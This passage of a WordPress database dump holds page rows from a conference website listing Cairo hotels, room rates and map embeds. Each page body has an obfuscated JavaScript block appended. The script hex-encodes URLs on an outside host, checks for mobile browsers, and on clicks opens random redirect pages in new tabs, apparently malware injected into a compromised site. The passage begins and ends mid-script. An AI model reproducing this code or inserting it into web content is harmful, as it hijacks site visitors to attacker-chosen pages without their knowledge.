_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Steigenberger Hotel El Tahrir','','publish','closed','closed','','steigenberger-hotel-el-tahrir','','','2023-08-02 14:43:25','2023-08-02 14:43:25','',0,'https://gsw2023.com/?page_id=4771',0,'page','',0),
(4773,1,'2023-06-24 00:19:26','2023-06-24 00:19:26','<!-- wp:paragraph -->\n<p><strong>For Booking</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Superior rooms at the below rate,</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>USD 190 per single room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>USD 210 per double room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong> Deluxe rooms at the below rate,</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>USD 210 per single room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>USD 230 per double room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Steigenberger Hotel El Tahrir','','inherit','closed','closed','','4771-revision-v1','','','2023-06-24 00:19:26','2023-06-24 00:19:26','',4771,'https://gsw2023.com/?p=4773',0,'revision','',0),
(4774,1,'2023-06-24 00:20:42','2023-06-24 00:20:42','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe><br />\n<a href=\"https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17\" target=\"_blank\" rel=\"noopener\">https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17</a>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 